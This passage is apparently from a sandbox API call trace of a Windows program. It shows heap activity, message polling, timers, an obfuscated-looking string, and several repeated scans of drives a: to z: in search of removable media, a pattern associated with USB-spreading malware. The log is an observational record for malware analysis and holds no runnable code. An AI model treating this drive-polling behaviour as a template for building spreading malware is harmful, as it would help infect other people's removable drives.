dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0222.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0222.176] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0222.176] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.176] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.177] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0222.177] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0222.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.177] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0222.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0222.177] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.177] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.292] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.292] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.292] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.293] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.293] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.293] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.293] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.294] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.294] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.294] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.294] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.295] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.295] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.295] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.295] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.296] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.296] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.296] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.296] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.297] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.297] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.297] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.298] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.298] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.325] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0222.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0222.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.325] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0222.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0222.325] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.326] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.326] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.326] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0222.326] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0222.326] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0222.326] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0222.326] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.327] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0222.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0222.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.327] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.327] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.327] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0222.327] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.327] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.327] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0222.327] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0222.328] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.328] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.328] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.328] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.328] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.328] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0222.328] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.329] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0222.329] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0222.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0222.329] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.330] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.330] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.330] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.330] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.330] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.330] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.331] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.331] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.331] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.331] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.331] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.332] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.332] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.332] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.332] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.333] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.333] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.333] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.333] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.333] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.334] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.334] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.334] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.334] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.334] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.335] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0222.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.335] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0222.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0222.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0222.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0222.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.336] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.337] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.337] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0222.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0222.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0222.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.338] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.338] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.342] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.343] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.343] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.343] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.343] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.343] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.487] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.487] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.487] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.487] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.488] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.488] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.488] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.489] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.489] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.489] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.489] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.489] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.489] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.490] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.490] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.490] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.490] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.490] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.490] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0222.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0222.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0222.492] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0222.492] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0222.492] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0222.492] SetTimer (hWnd=0x802d6, 